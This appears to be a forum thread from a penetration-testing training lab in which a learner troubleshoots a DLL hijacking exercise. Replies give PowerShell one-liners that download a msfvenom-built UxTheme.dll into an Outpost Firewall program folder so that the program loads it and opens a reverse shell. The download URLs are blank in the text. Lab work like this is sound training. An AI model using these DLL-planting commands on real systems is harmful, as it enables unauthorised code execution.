Dll hijacking lab command error


Remove Invoke-Expression (iex) from the command and try.

powershell -c (New-Object Net.WebClient).DownloadFile('', 'C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll')

Or Use this to download your DLL file to the target system.

powershell -c "Invoke-WebRequest -Uri '' -OutFile 'C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll'"

*Note that, i just assumed that your python server is running on port 4444. If its not, adjust it as per your config.

showing the actual commands you used would be more helpful…

You already downloaded the dll, so I guess your initial problem is solved?

What do you expect to happen when you download a dll? It pops a shell?

Yes after starting the handler and rebooting the machine a session is supposed to open, which isnt happening…I suggest u to try the lab cause something is wrong…

I suggest you supply the information requested…
what did you do after downloading the dll? where is it stored? how did you create it.
Please try at least to answer the questions youve been asked. Its probably NOT a lab issue but layer 8

Mate I followed the solutions, anyway I created the dll using msfvenom and it was stored in outpost folder as asked in solutins, after downloading the dll I started the handler and then rebooted the rdresktop as given, but I didnt get the session…
Last time u tried helping me in blind pentest lab where I couldnt get a session, but at the end u tried and couldnt get it either…I am sure that there is an issue with the lab/solutions.

thx, can u tell me whether u were able to get a session?

It doesnt matter what is given in the solution - it matters what you actually executed. just provide the commands and dont just talk about what you did

If you already had a big problem understanding the download code it is not far to assume that there are other things that gone wrong; that is not a problem, but at least I can not help without the information I asked for.

I didn’t try the lab.
I thought you having issue with downloading the dll using the commands provided in the lab. So i gave couple of methods to download the dll.

If i recall, i did the lab sometime back and it works fine. Just recheck your steps, may be the typo UxThemee.
The idea is, once the dll is downloaded and when it is called by the program, you gets a reverse shell. If you dont get a shell, then it could be because,

  1. dll config is wrong.
  2. dll is not being called by the program (ex: because of the typo).

yeah the dll themee spelling was wrong, I had corrected it still I couldnt get a session,dont think it has to do with configuration…btw r u on the unofficial discord server?

there are serveral other reasons this might happen… but hes refusing to tell what he actually did. insteand hes running in circles :man_shrugging:

After downloading the dll, use the sysinternals process monitor and check whether the program is able to access the dll. Well that’s one way to troubleshoot.

It could be much better if you list down the troubleshooting steps (with screenshots) you did for an easy resolution.

Already wasted a day and couldn’t find a solution, decided to move on…if u free at any moment lemme know I will share screen via discord or any other app, that would be a faster way otherwise I will have to do the whole process again and take scrsht then wait for comments here and then once again do the lab.

please leave the screenshots be and provide actual code…
but dont hesitate to ask again if you feel ready for it